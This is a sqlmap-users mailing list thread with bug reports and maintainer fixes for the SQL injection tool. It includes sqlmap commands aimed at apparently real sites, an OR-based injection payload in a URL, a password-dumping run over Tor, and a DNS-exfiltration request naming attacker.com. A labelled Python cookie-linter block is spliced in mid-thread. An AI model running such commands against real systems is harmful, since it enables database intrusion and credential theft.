>> On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
>> > Hi Dirk.
>> >
>> > Now that crash should be "patched".
>> >
>> > Could you please retry it now and say if the latest revision suits your needs?
>>
>> cool, thx. Works!
>>
>> However (sorry):
>>
>> One needs to omit the cookie in the request header, otherwise it just uses the one
>> supplied by the request.
>>
>> Then: It doesn't change the cookie. Maybe I was interpreting that not correctly
>> but my point was using the load-cookies option to direct sqlmap to change
>> cookies once in a while (whenever that's gonna be). This is to circumvent
>> restrictions one can encounter otherwise....
>>
>> Cheers,
>>
>> Dirk
>>
>> ------------------------------
>>
>> Message: 6
>> Date: Mon, 15 Apr 2013 14:01:01 -0700
>> From: <co...@5i...>
>> Subject: [sqlmap-users] --host parameter
>> To: sql...@li...
>> Message-ID: <201...@em...>
>> Content-Type: text/plain; charset="utf-8"
>>
>> Hello,
>> the --host doesn't work as expected, or I am doing something wrong:
>>
>> this works as expected:
>>
>> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>>
>> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool
>> http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>> prior mutual consent is illegal. It is the end user's responsibility to
>> obey all applicable local, state and federal laws. Developers assume no
>> liability and are not responsible for any misuse or damage caused by
>> this program
>>
>> [*] starting at 23:57:15
>>
>> [23:57:15] [INFO] testing connection to the target URL
>> [23:57:15] [INFO] heuristics detected web page charset 'ascii'
>> [23:57:15] [INFO] testing if the target URL is stable. This can take a couple of seconds
>> [23:57:16] [INFO] target URL is stable
>> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
>> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
>> [23:57:16] [INFO] GET parameter 'id' is dynamic
>> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
>> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>>
>> ....
>>
>> this doesn't work as expected:
>>
>> ./sqlmap.py --host='i.csland.ro' --url='http://188.240.236.15/index.php?id=0'
>>
>> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool
>> http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>> prior mutual consent is illegal. It is the end user's responsibility to
>> obey all applicable local, state and federal laws. Developers assume no
>> liability and are not responsible for any misuse or damage caused by
>> this program
>>
>> [*] starting at 23:58:03
>>
>> [23:58:03] [INFO] testing connection to the target URL
>> [23:58:03] [CRITICAL] page not found (404)
>> it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n]
>> [23:58:05] [WARNING] HTTP error codes detected during run:
>>
>> ............
>>
>> Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>>
>> Thanks.
>>
>> ------------------------------
>>
>> Message: 7
>> Date: Tue, 16 Apr 2013 09:12:05 +1100
>> From: ???????? ?????? <vo...@s2...>
>> Subject: [sqlmap-users] Sqlmap and direct connect error
>> To: sql...@li...
>> Message-ID: <C59...@s2...>
>> Content-Type: text/plain; charset=us-ascii
>>
>> Hi!
>>
>> This bug detected if add direct param.
>> >> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u " >> http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor >> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >> --exclude-sysdbs >> >> >> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, >> retry your run with the latest development version from the GitHub >> repository. If the exception persists, please send by e-mail to ' >> sql...@li...' or open a new issue at ' >> https://github.com/sqlmapproject/sqlmap/issues/new' with the following >> text and any information required to reproduce the bug. The developers will >> try to reproduce the bug, fix it accordingly and get back to you. >> sqlmap version: 1.0-dev-de99717 >> Python version: 2.7.3 >> Operating system: posix >> Command line: sqlmap.py -d >> **************************************************** -u >> http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor >> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >> --exclude-sysdbs >> Technique: None >> Back-end DBMS: MySQL (identified) >> Traceback (most recent call last): >> File "sqlmap.py", line 87, in main >> start() >> File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in >> start >> action() >> File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action >> setHandler() >> File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in >> setHandler >> conf.dbmsConnector.connect() >> File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in >> connect >> self.connector = pymysql.connect(host=self.hostname, user=self.user, >> passwd=self.password, db=self.db, port=self.port, >> connect_timeout=conf.timeout, use_unicode=True) >> File >> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", >> line 93, in Connect >> return Connection(*args, **kwargs) >> File >> 
"/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >> line 584, in __init__ >> self._connect() >> File >> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >> line 739, in _connect >> sock.connect((self.host, self.port)) >> File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in >> connect >> raise GeneralProxyError((5, _generalerrors[5])) >> GeneralProxyError: (5, 'bad input') >> >> >> >> >> ------------------------------ >> >> Message: 8 >> Date: Tue, 16 Apr 2013 14:19:18 +0200 >> From: Miroslav Stampar <mir...@gm...> >> Subject: Re: [sqlmap-users] --host parameter >> To: co...@5i... >> Cc: SqlMap List <sql...@li...> >> Message-ID: >> <CA+...@ma...> >> Content-Type: text/plain; charset="iso-8859-1" >> >> Hi. >> >> Thank you for your report and find it fixed with the latest commit [1]. >> >> Kind regards, >> Miroslav Stampar >> >> [1] >> >> https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86 >> >> >> On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote: >> >> > Hello, >> > the --host doesn't work as expected, or I am doing something wrong: >> > >> > >> > this works as expected: >> > >> > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0' >> > >> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database >> > takeover tool >> > http://sqlmap.org >> > >> > [!] legal disclaimer: Usage of sqlmap for attacking targets without >> > prior mutual consent is illegal. It is the end user's responsibility to >> > obey all applicable local, state and federal laws. Developers assume no >> > liability and are not responsible for any misuse or damage caused by >> > this program >> > >> > [*] starting at 23:57:15 >> > >> > [23:57:15] [INFO] testing connection to the target URL >> > [23:57:15] [INFO] heuristics detected web page charset 'ascii' >> > [23:57:15] [INFO] testing if the target URL is stable. 
This can take a >> > couple of seconds >> > [23:57:16] [INFO] target URL is stable >> > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic >> > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic >> > [23:57:16] [INFO] GET parameter 'id' is dynamic >> > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' >> > might be injectable (possible DBMS: 'MySQL') >> > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id' >> > >> > >> > .... >> > >> > >> > this doesn't work as expected: >> > >> > ./sqlmap.py --host='i.csland.ro' >> > --url='http://188.240.236.15/index.php?id=0' >> > >> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database >> > takeover tool >> > http://sqlmap.org >> > >> > [!] legal disclaimer: Usage of sqlmap for attacking targets without >> > prior mutual consent is illegal. It is the end user's responsibility to >> > obey all applicable local, state and federal laws. Developers assume no >> > liability and are not responsible for any misuse or damage caused by >> > this program >> > >> > [*] starting at 23:58:03 >> > >> > [23:58:03] [INFO] testing connection to the target URL >> > [23:58:03] [CRITICAL] page not found (404) >> > it is not recommended to continue in this kind of cases. Do you want to >> > quit and make sure that everything is set up properly? [Y/n] >> > [23:58:05] [WARNING] HTTP error codes detected during run: >> > >> > ............ >> > >> > >> > Of course i.csland.ro resolves to 188.240.236.15. Any idea? >> > >> > Thanks. >> > >> > >> > >> > >> ------------------------------------------------------------------------------ >> > Precog is a next-generation analytics platform capable of advanced >> > analytics on semi-structured data. The platform includes APIs for >> building >> > apps and a phenomenal toolset for data science. Developers can use >> > our toolset for easy data analysis & visualization. Get a free account! 
>> > http://www2.precog.com/precogplatform/slashdotnewsletter >> > _______________________________________________ >> > sqlmap-users mailing list >> > sql...@li... >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> -------------- next part -------------- >> An HTML attachment was scrubbed... >> >> ------------------------------ >> >> Message: 9 >> Date: Tue, 16 Apr 2013 14:33:33 +0200 >> From: Miroslav Stampar <mir...@gm...> >> Subject: Re: [sqlmap-users] Sqlmap and direct connect error >> To: ???????? ?????? <vo...@s2...> >> Cc: SqlMap List <sql...@li...> >> Message-ID: >> <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...> >> Content-Type: text/plain; charset="koi8-r" >> >> Hi Vladimir. >> >> Find it "patched" with the latest commit [1]. Basically, those >> combinations >> should not be allowed (-d and --url; -d and --tor; etc.) and now we've >> added new option validation checks for this kind of cases. >> >> Kind regards, >> Miroslav Stampar >> >> [1] >> >> https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a >> >> >> On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote: >> >> > Hi! >> > >> > This bug detected if add direct param. >> > >> > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u " >> > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor >> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >> > --exclude-sysdbs >> > >> > >> > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, >> retry >> > your run with the latest development version from the GitHub >> repository. If >> > the exception persists, please send by e-mail to ' >> > sql...@li...' or open a new issue at ' >> > https://github.com/sqlmapproject/sqlmap/issues/new' with the following >> > text and any information required to reproduce the bug. 
The developers >> will >> > try to reproduce the bug, fix it accordingly and get back to you. >> > sqlmap version: 1.0-dev-de99717 >> > Python version: 2.7.3 >> > Operating system: posix >> > Command line: sqlmap.py -d >> > **************************************************** -u >> > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor >> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >> > --exclude-sysdbs >> > Technique: None >> > Back-end DBMS: MySQL (identified) >> > Traceback (most recent call last): >> > File "sqlmap.py", line 87, in main >> > start() >> > File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in >> > start >> > action() >> > File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action >> > setHandler() >> > File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in >> > setHandler >> > conf.dbmsConnector.connect() >> > File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in >> > connect >> > self.connector = pymysql.connect(host=self.hostname, user=self.user, >> > passwd=self.password, db=self.db, port=self.port, >> > connect_timeout=conf.timeout, use_unicode=True) >> > File >> > >> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", >> > line 93, in Connect >> > return Connection(*args, **kwargs) >> > File >> > >> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >> > line 584, in __init__ >> > self._connect() >> > File >> > >> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >> > line 739, in _connect >> > sock.connect((self.host, self.port)) >> > File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in >> > connect >> > raise GeneralProxyError((5, _generalerrors[5])) >> > GeneralProxyError: (5, 'bad input') >> > >> > >> > >> > >> ------------------------------------------------------------------------------ >> > 
Precog is a next-generation analytics platform capable of advanced >> > analytics on semi-structured data. The platform includes APIs for >> building >> > apps and a phenomenal toolset for data science. Developers can use >> > our toolset for easy data analysis & visualization. Get a free account! >> > http://www2.precog.com/precogplatform/slashdotnewsletter >> > _______________________________________________ >> > sqlmap-users mailing list >> > sql...@li... >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> -------------- next part -------------- >> An HTML attachment was scrubbed... >> >> ------------------------------ >> >> Message: 10 >> Date: Tue, 16 Apr 2013 23:26:39 +0200 >> From: buawig <bu...@gm...> >> Subject: [sqlmap-users] feature request: offline mode for >> --dns-domain? >> To: SqlMap List <sql...@li...> >> Message-ID: <516...@gm...> >> Content-Type: text/plain; charset=UTF-8 >> >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA512 >> >> Hi, >> >> in cases where sqlmap is run against targets on internal networks it >> would be great if one could tell sqlmap to simply proceed without >> expecting incoming DNS requests, because sqlmap can not be executed >> directly on the DNS server (which can't reach the target, but the >> target can reach the DNS server). >> >> For me it would be enough to simply run something like >> - -u ... --dns-domain=attacker.com --dns-port=0 >> (--dns-port does not exist [yet]) >> >> to let sqlmap know that it doesn't need to start a DNS listener. >> >> I would then collect and decode the DNS querries on the DNS server >> manually, but I could also envision running a second sqlmap instance >> on the DNS server with --dns-domain (but without -u) doing that job. 
>> >> ------------------------------ >> >> Message: 11 >> Date: Tue, 16 Apr 2013 23:24:23 +0200 >> From: buawig <bu...@gm...> >> Subject: [sqlmap-users] feature request: --dns-domain for non-root >> users (--dns-port) >> To: sql...@li... 
>> Message-ID: <516...@gm...> >> Content-Type: text/plain; charset=UTF-8 >> >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA512 >> >> Hi, >> >> I just wanted to request a "extension" for a previous feature request >> (DNS exfiltration [1]) but after looking at my former feature request >> I realized that it included already the feature I was about to request: >> >> - --dns-domain for non-root users: >> - --dns-port >> >> The use-case is mentioned in the former feature request: >> >> [1] http://sourceforge.net/mailarchive/message.php?msg_id=27108100 >> >> >> >> ------------------------------ >> >> Message: 12 >> Date: Tue, 16 Apr 2013 20:52:26 -0500 >> From: Brian Milliron <Br...@EC...> >> Subject: [sqlmap-users] Domain credentials >> To: sql...@li... >> Message-ID: <516...@EC...> >> Content-Type: text/plain; charset=ISO-8859-1; format=flowed >> >> What is the correct format to make a direct connection to a database >> using windows domain credentials? 
>> I have tried >> ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred >> "DOMAIN\user:pass" >> ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred >> "DOMAIN\\user:pass" >> ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred >> "DOMAIN\user:pass" --auth-type NTLM >> ./sqlmap.py -d "mssql://user:pass@10.10.10.10:1433/REMOTE_DB" >> >> I get this error "[CRITICAL] DB-Lib error message 20017, severity 9: >> Unexpected EOF from the server >> Net-Lib error during Operation now in progress Error 115 - Operation now >> in progressDB-Lib error message 20002, severity 9: >> Adaptive Server connection failed" >> >> >> >> ------------------------------ >> >> Message:... [truncated message content] |
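An added example, not part of the original thread and not sqlmap's code: a small Python linter for the Netscape-format cookie files discussed in the --load-cookies exchange quoted in the digest above. It flags the two things that exchange turns on, an expiry field of 0 and a domain flag that disagrees with the domain's leading dot (the `assert domain_specified == initial_dot` in the quoted cookielib traceback), plus the domain and expiry checks Miroslav asks for; the host names, cookie values and function names are constructed for illustration.

```python
# Added example: lint a Netscape-format cookies.txt before passing it to a
# cookielib-based loader. Host names and cookie values are constructed.

FIELDS = ("domain", "domain_specified", "path", "secure",
          "expires", "name", "value")


def parse_line(line):
    """Return a dict for one record, or None for comments and blank lines."""
    line = line.rstrip("\r\n")
    if not line.strip() or line.lstrip().startswith("#"):
        return None
    parts = line.split("\t")
    if len(parts) != len(FIELDS):
        raise ValueError("expected 7 tab-separated fields, got %d" % len(parts))
    return dict(zip(FIELDS, parts))


def domain_matches(cookie_domain, host):
    """True if host is the cookie domain or a subdomain of a dotted domain."""
    cookie_domain, host = cookie_domain.lower(), host.lower()
    if cookie_domain.startswith("."):
        return host == cookie_domain[1:] or host.endswith(cookie_domain)
    return host == cookie_domain


def lint_record(rec, target_host, now):
    """Return the list of findings for one parsed record."""
    findings = []
    # Same condition as the assertion in the quoted traceback: the second
    # column must be TRUE exactly when the domain starts with a dot.
    initial_dot = rec["domain"].startswith(".")
    if (rec["domain_specified"] == "TRUE") != initial_dot:
        findings.append("flag-mismatch")
    # The cookie is only sent if its domain covers the target host.
    if not domain_matches(rec["domain"], target_host):
        findings.append("domain-mismatch")
    # wget --keep-session-cookies writes 0 for session cookies; a loader that
    # reads the field as a UNIX time treats that as already expired.
    exp = rec["expires"]
    if exp in ("", "0"):
        findings.append("expiry-zero")
    elif not exp.isdigit():
        findings.append("bad-expiry")
    elif int(exp) <= now:
        findings.append("expired")
    return findings


def lint_file(text, target_host, now):
    """Return [(line_number, cookie_name, findings)] for records with findings."""
    report = []
    for lineno, line in enumerate(text.splitlines(), 1):
        try:
            rec = parse_line(line)
        except ValueError:
            report.append((lineno, None, ["malformed"]))
            continue
        if rec is None:
            continue
        findings = lint_record(rec, target_host, now)
        if findings:
            report.append((lineno, rec["name"], findings))
    return report


# Constructed sample input (not taken from the thread).
SAMPLE = "\n".join([
    "# Netscape HTTP Cookie File",
    "app.example.test\tFALSE\t/shop\tTRUE\t0\tJSESSIONID\tAAAA1111",
    "app.example.test\tTRUE\t/shop\tTRUE\t9999999999\tJSESSIONID\tBBBB2222",
    ".example.test\tTRUE\t/\tFALSE\t1366000000\tprefs\tx",
    ".other.test\tTRUE\t/\tFALSE\t9999999999\ttrack\ty",
    "broken line without tabs",
    "app.example.test\tFALSE\t/\tTRUE\t9999999999\tcsrf\tz",
])
NOW = 1366020000  # constructed "current time" in April 2013

if __name__ == "__main__":
    for lineno, name, findings in lint_file(SAMPLE, "app.example.test", NOW):
        print("line %d (%s): %s" % (lineno, name, ", ".join(findings)))
```
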
From: Miroslav S. <mir...@gm...> - 2014-05-13 13:40:33
Hi Bob. It's a bash problem (reproduced it this moment). Using single quotes (') instead of double quotes (") should solve this issue. Kind regards, Miroslav Stampar On Tue, May 13, 2014 at 5:05 AM, Bob <sto...@qq...> wrote: > > Hi Miroslav, > > Thanks for your email, > > but still the same after I tried sqlmap -u ".." > > > > sqlmap -u " > http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=aa > " > bash: !search.do?keyword=: event not found > > > best regards > bob > ------------------ > > > > > ------------------ Original Message ------------------ > *From:* "Miroslav Stampar";<mir...@gm...>; > *Sent:* Sunday, May 11, 2014, 10:38 PM > *To:* "Bob"<sto...@qq...>; > *Cc:* "SqlMap List"<sql...@li...>; > *Subject:* Re: [sqlmap-users] sqlmap-user event not found error > > Hi Bob. > > Please enclose the url part with quotes (e.g. ./sqlmap.py -u "..." ...) > > Kind regards, > Miroslav Stampar > > > On Sun, May 11, 2014 at 8:32 AM, Bob <sto...@qq...> wrote: > >> Hi friend, >> >> I have problem with ! inside URL . >> >> /sqlmap.py -u >> http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=-p input_mailbar --dbms=MySQL --risk=3 --level=5 -o --param-del= >> bash: !search.do?keyword=: event not found >> >> How should I do ? >> >> thanks >> >> bob >> ------------------ >> >> >> >> >> ------------------ Original ------------------ >> *From: * "Miroslav Stampar";<mir...@gm...>; >> *Date: * Fri, May 31, 2013 03:00 AM >> *To: * "Bob"<sto...@qq...>; >> *Cc: * "sqlmap-users"<sql...@li...>; >> *Subject: * Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1 >> >> Hi. >> Have you been able to retrieve user names normally? I mean, were they >> normally been displayed in console output? 
>> Also, is boolean technique the only one detected by sqlmap in your case >> (or maybe UNION)? >> Kind regards, >> Miroslav Stampar >> >> >> On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote: >> >>> Hi friend, >>> >>> >>> Could you help me with this bug ? >>> >>> >>> [22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your >>> run with the latest development version from the GitHub repository. If the >>> exception persists, please send by e-mail to ' >>> sql...@li...' or open a new issue at ' >>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following >>> text and any information required to reproduce the bug. The developers will >>> try to reproduce the bug, fix it accordingly and get back to you. >>> sqlmap version: 1.0-dev >>> Python version: 2.7.3 >>> Operating system: posix >>> Command line: ./sqlmap -u >>> *********************************************** >>> --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP >>> -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft >>> SQL Server --users --passwords >>> Technique: BOOLEAN >>> Back-end DBMS: Microsoft SQL Server (fingerprinted) >>> Traceback (most recent call last): >>> File "./sqlmap", line 87, in main >>> start() >>> File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start >>> action() >>> File 
"/usr/share/sqlmap/lib/controller/action.py", line 81, in action >>> conf.dbmsHandler.getPasswordHashes(), "password hash", >>> CONTENT_TYPE.PASSWORDS) >>> File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in >>> getPasswordHashes >>> if user in retrievedUsers: >>> TypeError: unhashable type: 'list' >>> >>> [*] shutting down at 22:54:12 >>> Thanks >>> >>> BOB >>> >>> >>> ------------------ Original ------------------ >>> *From: * "sqlmap-users-request"< >>> sql...@li...>; >>> *Date: * May 29, 2013 >>> *To: * "sqlmap-users"<sql...@li...>; >>> *Subject: * sqlmap-users Digest, Vol 31, Issue 1 >>> >>> Send sqlmap-users mailing list submissions to >>> sql...@li... >>> >>> To subscribe or unsubscribe via the World Wide Web, visit >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> or, via email, send a message with subject or body 'help' to >>> sql...@li... >>> >>> You can reach the person managing the list at >>> sql...@li... >>> >>> When replying, please edit your Subject line so it is more specific >>> than "Re: Contents of sqlmap-users digest..." >>> >>> >>> Today's Topics: >>> >>> 1. Re: Feature request (David Guimaraes) >>> 2. Re: --load-cookies (Dirk Wetter) >>> 3. Re: --load-cookies (Miroslav Stampar) >>> 4. Re: Patch for /task/<task_id>/delete in clean_filesystem >>> (Miroslav Stampar) >>> 5. Re: --load-cookies (Dirk Wetter) >>> 6. --host parameter (co...@5i...) >>> 7. Sqlmap and direct connect error (???????? ??????) >>> 8. Re: --host parameter (Miroslav Stampar) >>> 9. Re: Sqlmap and direct connect error (Miroslav Stampar) >>> 10. feature request: offline mode for --dns-domain? (buawig) >>> 11. feature request: --dns-domain for non-root users (--dns-port) >>> (buawig) >>> 12. Domain credentials (Brian Milliron) >>> 13. Re: Domain credentials (Brandon Perry) >>> 14. Re: feature request: offline mode for --dns-domain? >>> (Miroslav Stampar) >>> 15. Re: Domain credentials (Miroslav Stampar) >>> 16. 
Re: feature request: fetch DNS queries from DNS server via >>> HTTP (buawig) >>> 17. Re: feature request: fetch DNS queries from DNS server via >>> HTTP (Miroslav Stampar) >>> 18. MySQL error based technique bug (Konrads Smelkovs) >>> 19. Re: MySQL error based technique bug (Miroslav Stampar) >>> 20. SQLmap crashing (Phillip Wylie) >>> 21. Re: SQLmap crashing (Miroslav Stampar) >>> 22. Custom injection payload in POST (Marcell Fodor) >>> 23. Re: SQLmap crashing (Miroslav Stampar) >>> 24. I got error on windows (warezhacking) >>> 25. Appending to a dump (Stephen Shkardoon) >>> 26. Re: Appending to a dump (Miroslav Stampar) >>> 27. Re: Appending to a dump (Stephen Shkardoon) >>> 28. Re: Appending to a dump (Miroslav Stampar) >>> 29. --ignore-404 ? (buawig) >>> 30. PostgreSQL: substr('string', 1, 1) vs. substring('string' >>> from 1 for 1) (buawig) >>> 31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string' >>> from 1 for 1) (Miroslav Stampar) >>> 32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string' >>> from 1 for 1) (Miroslav Stampar) >>> 33. Re: --ignore-404 ? (Miroslav Stampar) >>> 34. BUG...!!!! o.O (Isai Ofir Juarez Contreras) >>> 35. Re: BUG...!!!! o.O (Miroslav Stampar) >>> 36. gun...@gm... wants to follow you. Accept? >>> (gun...@gm...) >>> 37. Direct access to mysql database (Marcell Fodor) >>> 38. Re: Direct access to mysql database (Miroslav Stampar) >>> 39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio... >>> (Badoo) >>> 40. Not getting any sensitive data from database (Marcell Fodor) >>> 41. Re: Not getting any sensitive data from database >>> (Miroslav Stampar) >>> 42. unhandled exception (kvasilopoulos) >>> 43. [SQLMAP] Unhandled exception for IPv6 >>> (e.n...@st...) >>> 44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar) >>> 45. Re: unhandled exception (Miroslav Stampar) >>> 46. Passing SOAPAction in --header (Brandon Perry) >>> 47. Re: Passing SOAPAction in --header (Miroslav Stampar) >>> 48. 
Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar) >>> 49. Blind SQL Injection question (Guy Dufour) >>> 50. Re: Blind SQL Injection question (Chris Oakley) >>> 51. Re: Passing SOAPAction in --header (Brandon Perry) >>> 52. Re: Passing SOAPAction in --header (Brandon Perry) >>> 53. Deploy&Create SSH/tunnel with compromised MSSQL server >>> (Alok Kumar) >>> 54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server >>> (Brandon Perry) >>> 55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server >>> (Alok Kumar) >>> 56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server >>> (Brandon Perry) >>> 57. SQLMAP Bug (Joe O'Hara) >>> 58. Re: SQLMAP Bug (Miroslav Stampar) >>> 59. [CRITICAL] (Thai Thao) >>> 60. Re: [CRITICAL] (Miroslav Stampar) >>> 61. Providing multiple dbms (Sebastian Nerz) >>> 62. Re: Providing multiple dbms (Miroslav Stampar) >>> >>> >>> ---------------------------------------------------------------------- >>> >>> Message: 1 >>> Date: Sat, 13 Apr 2013 21:40:39 -0300 >>> From: David Guimaraes <sk...@gm...> >>> Subject: Re: [sqlmap-users] Feature request >>> To: Miroslav Stampar <mir...@gm...> >>> Cc: SqlMap List <sql...@li...> >>> Message-ID: >>> <CAJ...@ma...> >>> Content-Type: text/plain; charset="iso-8859-1" >>> >>> Good question Miroslav.. I tried to think in something that can be >>> implemented without ruin sqlmap query schema, but I could not come to any >>> conclusion... =( >>> >>> The thing is, sqlsus use a different approch to dump the data, making >>> this >>> kind of thing possible... >>> >>> The solution that I found in this particular scenario is to use sqlsus, >>> unfortunately... >>> >>> Regards. >>> >>> David >>> >>> >>> On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar < >>> mir...@gm... >>> > wrote: >>> >>> > Hi David. >>> > >>> > And what do you recommend to be done in case of query with length > >>> > max_inj_length? 
>>> > >>> > Kind regards, >>> > Miroslav Stampar >>> > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote: >>> > >>> >> Hi, I am trying to perform sql injection on a web site but I can not >>> get >>> >> successful due to a size limitation on the query sent to the server. >>> The >>> >> server is limiting the size of query in 512 bytes only and sqlmap do >>> not >>> >> have any customization that allows me to bypass this restriction like >>> >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called >>> "autoconf" >>> >> that measure the permited query size. >>> >> >>> >> There is some chance to put this kind of feature in sqlmap? >>> >> >>> >> Thanks. >>> >> >>> >> -- >>> >> David Gomes Guimar?es >>> >> >>> >> >>> >> >>> ------------------------------------------------------------------------------ >>> >> Own the Future-Intel® Level Up Game Demo Contest 2013 >>> >> Rise to greatness in Intel's independent game demo contest. >>> >> Compete for recognition, cash, and the chance to get your game >>> >> on Steam. $5K grand prize plus 10 genre and skill prizes. >>> >> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d >>> >> _______________________________________________ >>> >> sqlmap-users mailing list >>> >> sql...@li... >>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >>> >> >>> >>> >>> -- >>> David Gomes Guimar?es >>> -------------- next part -------------- >>> An HTML attachment was scrubbed... >>> >>> ------------------------------ >>> >>> Message: 2 >>> Date: Mon, 15 Apr 2013 11:36:37 +0200 >>> From: Dirk Wetter <sp...@dr...> 